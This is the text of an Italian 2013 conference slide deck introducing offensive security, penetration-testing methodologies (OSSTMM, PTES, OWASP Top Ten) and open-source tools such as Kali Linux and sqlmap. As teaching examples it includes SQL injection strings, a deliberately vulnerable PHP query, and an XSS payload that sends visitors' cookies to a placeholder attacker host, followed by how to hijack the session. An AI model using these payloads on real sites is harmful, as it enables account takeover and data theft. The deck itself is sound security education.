Offensive security con strumenti open source

Andrea Zwirner

[email protected] @AndreaZwirner

Pordenone Fiere

Linux Arena 2013

Offensive Security con strumentiOpen Source

Andrea Zwirner● Master di certificazione OSCP – Offensive Security Certified Professional

● Professionista nel campo della sicurezza informatica: “security auditor e penetration tester ”

● Fondatore di Linkspirit● Security auditing, security advising e penetration testing● Training in corsi di sicurezza informatica

● Articolista e revisore per la rivista di settore PenTest Magazine

Pordenone Fiere – Linux Arena 2013Offensive Security con strumenti Open Source

2

● Appassionato di sicurezza informatica ed Open Source

● Collaborazione con ISECOM (Instiute for Security and Open Methodologies)

● Collaborazione al progetto Hacker Highschool – Security awareness for teens


3Andrea Zwirner

Cos'è la sicurezza informatica – versione WikipediaRamo dell'informatica che si occupa

● dell'analisi delle vulnerabilità, dei rischi e delle minacce che possono affliggere un sistema informatico

● della protezione dell'integrità del software di un sistema informatico

● della protezione dei dati contenuti in un sistema informatico o da esso scambiati

● della protezione di un sistema informatico da attacchi di software malevoli


4

Cos'è la sicurezza informaticaScienza inesatta che si occupa di garantire

● C O N F I D E N Z I A L I T A 'C O N F I D E N Z I A L I T A '

● I N T E G R I T A 'I N T E G R I T A '

● D I S P O N I B I L I T A 'D I S P O N I B I L I T A '

dell'informazione.


5

Esempi di attacchi alla confidenzialità dell'informazione● Ottenere accesso ad informazioni senza disporre delle autorizzazioni necessarie

● Esempi

● leggere dati in transito sul canale di comunicazione (sniffing)

● decodificare dati crittografati mediante attacchi alle chiavi (dizionari, brute force, rainbow tables)


6

Esempi di attacchi all'integrità dell'informazione● Ottenere la possibilità di alterare o eliminare informazioni senza disporre delle autorizzazioni necessarie

● Esempi

● modificare o alterare dati in transito sul canale di comunicazione

● Esempio eccezionale è stato sslstrip di Moxie Marlinspike

● modificare o eliminare dati residenti nel sistema


7

Esempi di attacchi alla disponibilità dell'informazione● Ottenere la possibilità di interrompere l'erogazione di un servizio o bloccare un sistema

● Esempi

● alterare o eliminare dati o configurazioni di importanza critica per il funzionamento del sistema;

● sferrare attacchi mirati ad esaurire le risorse computazionali o di rete del sistema (DoS, DDoS);


8

Note legali

Reato di accesso abusivo ad un sistema informatico o telematico

● Punito dall'art. 615-ter del Codice Penale

● Pena prevista: da 1 a 3 anni di reclusione

● Aggravante per il danneggiamento dei dati o interruzione, anche parziale, del sistema:

● Pena prevista: da 1 a 5 anni di reclusione


9

Esclusione di responsabilitàQuanto descritto in questa presentazione può

essere applicato solo su sistemi informatici di

proprietà o dietro rilascio di autorizzazione

scritta del legale proprietario degli stessi.

Il relatore non si assume alcuna responsabilità

di qualunque eventuale abuso delle informazioni

riportate in questa presentazione.


10

Sicurezza informatica difensiva – descrizione● Definizione di policy di accesso a servizi e informazioni

● quali permessi servono per fare cosa

● Difesa perimetrale dell'infrastruttura

● configurazione delle apparecchiature di rete mediante un modello di progettazione architetturale ritenuto sicuro

● Difesa interna dell'infrastruttura

● Installazione di apparecchiature e software anti intrusione ed infezione

● Formazione degli utenti finali (troppo raramente)


11

Sicurezza informatica difensiva – effetti percepiti● Forte senso di sicurezza indotto dalla qualità percepita

● ottime campagne di marketing dei produttori

● ingenti costi sostenuti

● un sacco di nuove lucine lampeggianti in sala dati


12

Sicurezza informatica difensiva – effetti reali● Mancata rilevazione di errori di configurazione

● Obsolescenza delle metodologie di difesa implementate

● Rapida obsolescenza delle apparecchiature installate

● Scoperta di bug di sicurezza e produzione relativi exploit per i servizi erogati


13

Sicurezza informatica difensiva – effetti reali● Mancata rilevazione di errori di configurazione

● Obsolescenza delle metodologie di difesa implementate

● Rapida obsolescenza delle apparecchiature installate

● Scoperta di bug di sicurezza e produzione relativi exploit per i servizi erogati

C O N C L U S I O N EC O N C L U S I O N E

VENGONO LASCIATE MILLE PORTE APERTEVENGONO LASCIATE MILLE PORTE APERTE


14

● Come prima, l'infrastruttura viene progettata ed implementata con criterio, applicando tutte le migliori prassi

Sicurezza informatica offensiva


15

● Come prima, l'infrastruttura viene progettata ed implementata con criterio, applicando tutte le migliori prassi

P E R O ' P O I S I V E R I F I C A C H EP E R O ' P O I S I V E R I F I C A C H E

T U T T O S I A E F F E T T I V A M E N T E S I C U R OT U T T O S I A E F F E T T I V A M E N T E S I C U R O

Sicurezza informatica offensiva


16

CI SI METTE NEI PANNI DELL'ATTACCANTE E SI CERCA DICI SI METTE NEI PANNI DELL'ATTACCANTE E SI CERCA DI

VIOLARE IL PROPRIO SISTEMA PER TROVARNE LE FALLEVIOLARE IL PROPRIO SISTEMA PER TROVARNE LE FALLE

● Il sistema informatico viene quindi verificato da uno o più esperti (penetration tester) che utilizzano gli stessi

● Metodologie

● Strumenti

utilizzati dagli attaccanti reali al fine di trovarne le vulnerabilità

Sicurezza informatica offensiva: la metodologia


17

OSSTMM Open Source Security Testing Methodology Manual Licenza: Creative Commons 3.0

PTES Penetration Testing Execution Standard Licenza: GNU Free Documentation License 1.2

OWASP Open Web Application Security Project Licenza: Creative Commons 3.0

Metodologie Open Source per il penetration testing


18

● Sviluppato da ISECOM in oltre 10 anni (attualmente ver. 3)

● Standard internazionale de-facto per le verifiche di sicurezza operativa (di pressoché qualunque cosa!)

● Utilizzato in tutto il mondo per security audit di sistemi di governi, pubblica amministrazione, scuole ed aziende di ogni dimensione

● In fase di standardizzazione da parte dell'ISO ad integrare la famiglia di standard di sicurezza delle informazioni ISO/IEC 27000

● 27001 – Information security management systems requirements

● 27002 – Code of practice for information security management

Open Source Security Testing Methodology Manual


19

● Standard nuovo ed in fase di sviluppo, ma già molto utilizzato in ambito IT Security

● Definisce linee guida utili sia per il mondo IT sia per quello Business

● Offre al penetration tester uno standard solido per il corretto svolgimento del security audit

● Offre al mondo business solidi criteri di valutazione sulla qualità del lavoro proposto e svolto

● Apre un canale di comunicazione omogeneo tra i due mondi definendo un linguaggio comune

Penetration Testing Execution Standard


20

● Ricognizione di base (information gathering, enumeration)

● Ricostruzione della struttura interna dell'azienda e della rete

● Ricognizione specifica su persone e macchine enumerate

● Ricerca di errori nella configurazione di apparati o servizi

● Stesura della mappa delle vulnerabilità

● Ricerca, scrittura ed esecuzione di exploit

● Raccolta delle evidenze (proof of concept – PoC)

● Stesura del report

Il processo di audit - compendio OSSTMM e PTES


21

● Associazione senza scopo di lucro

● Missione: aumentare la visibilità relativa la sicurezza del software al fine di permettere di prendere decisioni informate ad imprese ed individui

● Attiva nel campo della ricerca e divulgazione della cultura della sicurezza partecipando a conferenze in tutto il mondo

● Attualmente gestisce oltre 20 progetti legati alla sicurezza relativi a linguaggi, librerie, API, best practices, auditing, etc, suddivisi in

● PROTECT – tools e documenti relativi la protezione da minacce● DETECT – tools e documenti relativi la rilevazione di difetti● LIFE CYCLE – tools e documenti per implementare attività di

sicurezza nel ciclo di sviluppo del software

Open Web Application Security Project


22

● Spiega come effettuare web application penetration test rapidi, mirati ed efficaci

● Indirizzata a sviluppatori e beta tester

● Rilasciata in PDF, ma mantenuta in modalità wiki, in maniera da permetterne il costante aggiornamento

● Raccoglie il consenso di migliaia di esperti nel mondo circa le modalità di rilevazione di minacce di sicurezza nel software

OWASP – Testing Project


23

● Descrive le dieci vulnerabilità valutate come più rischiose (non comuni) in ambito web application

● Finalizzato ad educare sviluppatori, designer, manager ed organizzazioni circa le problematiche trattate

● Fornisce linee guida per la verifica della presenza delle problematiche selezionate e come prevenirle

OWASP – Top Ten Project


24

● A1: Injection

● A2: Broken Authentication and Session Management

● A3: Cross-Site Scripting (XSS)

● A4: Insecure Direct Object References

● A5: Security Misconfiguration

● A6: Sensitive Data Exposure

● A7: Missing Function Level Access Control

● A8: Cross-Site Request Forgery (CSRF)

● A9: Using Known Vulnerable Components

● A10: Unvalidated Redirects and Forwards

OWASP Top Ten 2013 – RC1


25

● Avviene quando un'applicazione invia dati non fidati ad un interprete

● Esempi: SQL, LDAP, chiamate al S.O., argomenti a comandi, etc

A1: Injection


26



● Esempio – SQL Injection superclassica (ma si trova ancora, molto!)

$nome = $_POST['nome'];$query = "SELECT * FROM t WHERE nome='" + $nome + "'";$result = mysql_query($query);

A1: Injection


27





Pacifico, ma cosa succederebbe se io mi chiamassi

Andrea' OR 1=1 --?

A1: Injection


28





Pacifico, ma cosa succederebbe se io mi chiamassi

Andrea' OR 1=1 --?

A1: Injection

SELECT * FROM t WHERE nome= 'Andrea' OR 1=1 --'


29

Injection fun

Pronto, qui è la scuola di suo figlio, abbiamo qualche problema informatico.Oh, mi dica... Robert ha mica rotto qualcosa?In un certo senso... Senta, suo figlio si chiama veramente

Robert'); DROP TABLE Students; --?…


30

Injection fun

ZU 0666',0,0); DROP DATABASE TABLICE; --


31

sqlmap - Open Source SQL Injection● Pieno supporto per MySQL, Oracle, PostgreSQL,

Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase e SAP MaxDB

● Supporto per le tecniche di SQL Injection:

● Boolean based blind, time based blind, UNION query, error-based, stacked query e out of band

● Possibilità di tracciare l'intera struttura dei database serviti dal motore

● Supporto per dump di intere tabelle, range di record o colonne specifiche

● Supporto per il download/upload di qualunque file sul server nei casi di MySQL, PostgreSQL o Microsoft SQL Server


32

● Avviene quando un'applicazione web include in una pagina dati forniti da un utente (ogni social network) senza averli validati.

● E' un attacco client-side (JavaScript, ActiveX, Java, VBScript, etc)

● Ne esistono di tre tipi:

● Stored XSS – persistenti a database (forum, log, campi di commento, etc)

● Reflected XSS – altri vettori d'attacco (es. email) che fanno effettuare la richiesta HTTP forgiata in maniera da ottenere la risposta che esegue il codice client-side

● DOM based – che modificano l'ambinente DOM (Document Object Model) del browser

A3: Cross-Site Scripting (XSS)


33

● Esempio classico (ma, di nuovo, ancora funzionante e molto in voga!)

● Qualunque form il cui contenuto (non validato) venga poi servito in una pagina

● Nome: Andrea● Cognome: <script>alert('XSS');</script>



34

● Esempio classico (ma, di nuovo, ancora funzionante e molto in voga!)

● Qualunque form il cui contenuto (non validato) venga poi servito in una pagina

● Nome: Andrea● Cognome: <script>alert('XSS');</script>

● La pagina html risultante quindi conterrà qualcosa tipo:

<html>...

<p>Andrea <script>alert('XSS');</script> è passato di qui.</p>

...</html>



35

Ed ecco il risultato: abbiamo appena eseguito codice lato client sul computer di ogni visitatore del sito



36

E' un attacco così famoso che ha anche un profilo professionale su LinkedIn



37

● Cosa sarebbe successo se nel campo avessimo messo un bel:

<script>new Image.src=”http://IP/pippo.php

?cookie= + document.cookie +&location= + document.location”

</script>



38

● Cosa sarebbe successo se nel campo avessimo messo un bel:

<script>new Image.src=”http://IP/pippo.php

?cookie= + document.cookie +&location= + document.location”

</script>

AVREMMO RUBATO LA SESSIONE AL VISITATOREAVREMMO RUBATO LA SESSIONE AL VISITATORE

Ci siamo fatti spedire i cookie relativi il documento aperto, ossia i parametri relativi la sua sessione sul sito



39

● tamperdata

● Addon per Firefox che permette di vedere e modificare gli header HTTP/HTTPS ed i parametri POST

● firebug

● Tool che si integra con firefox per il debugging delle pagine web. Permette di modificare, debuggare e monitorare CSS, HTML, JavaScript e cookie in modalità live

● Usando queste estensioni di firefox possiamo impostarci i parametri di sessione dell'utente, quindi andare a visitare il sito impersonandolo.

(ecco perché il logout è importante)

Tamperdata, firebug


40

Back|Track Linux BackBox Linux Kali Linux

● Distribuzioni Linux appositamente sviluppate per l'esecuzione di test di sicurezza offensiva (ed altro: analisi forense, OSINT)

● Sono toolbox ordinati (in maniera maniacale) di strumenti Open Source (e non) utilizzabili nell'ambito del penetration test

Strumenti Open Source per il penetration testing


41


42

● Distribuzione Linux Live installabile, per attività di penetration test, intelligence e forensics analisys

● Basata su Ubuntu e progettata per essere leggera e prestante

● Meno matura di Back|Track, ma molto promettente

● Più aperta di Back|Track dal punto di vista dello sviluppo

BackBox Linux – introduzione


43


44

● Basata prima su Slax Linux, portata in seguito sotto Ubuntu

● Distribuzione Linux Live installabile, per attività di penetration test, intelligence e forensics analisys con oltre 600 tools diponibili

● Aderente agli standard OSSTMM, OWASP ed OSINT

● Open Source, ma con team di sviluppo piuttosto chiuso (sviluppata e gestita da due società del settore)

● Utilizzata da agenzie di intelligence e da reparti governativi della difesa, oltre che da centinaia di migliaia di professionisti, ricercatori ed appassionati di sicurezza in tutto il mondo

Back|Track Linux – introduzione


45


46

● Evoluzione di Back|Track Linux

● Derivata da Debian Wheezy, forka meno pacchetti possibile, aderisce ai suoi standard di sviluppo, ne eredita le linee giuda

● Aderisce al FHS (Filesystem Hierarchy Standard) – non più /pentest

● Kernel patch per injection – aircrack-ng

● Supporto per ARMEL e ARMHF

● Raspberry Pi – ODROID U2 – Samsung Chromebook ed altri

● Ottima documentazione e comunità attiva

Kali Linux – penetration testing redefined


47

The Exploit Database


48

● Raccoglie exploit per ogni falla di sicurezza rilevata per ogni software su ogni piattaforma e la indicizza in maniera efficace per la navigazione

● Contiene exploit in formato sorgente (Open Source) indicizzati in base a piattaforma, tipologia (remota/locale), software di riferimento ed altri

● Contiene oltre 100 documenti relativi la sicurezza offensiva in ogni ambito esistente (server, software, API, mobile, etc)

● Un punto di riferimento per penetration tester, ricercatori ed appassionati di sicurezza offensiva (ed hacker..)

The Exploit Database – introduzione


49

Back|Track ed integrazione con Exploit-DB


50

● Come per ogni altro campo dell'informatica, anche per la sicurezza il contributo dato dall'Open Source è stato incommensurabile.

● La filosofia di condivisione della conoscenza dell'Open Source ha portato a:

● definizione di metodologie tanto efficaci che sono diventati standard internazionali

● sviluppo di centinaia e software e tool aderenti agli standard ed utilizzati da professionisti, aziende e governi

● divulgazione di una cultura per la sicurezza e la tutela della propria privacy in rete

Morale della favola


51

Domande? Dubbi? Perplessità?


52

Andrea Zwirner

[email protected] @AndreaZwirner

Pordenone Fiere

Linux Arena 2013

Offensive Security con strumentiOpen Source

Education

Offensive security con strumenti open source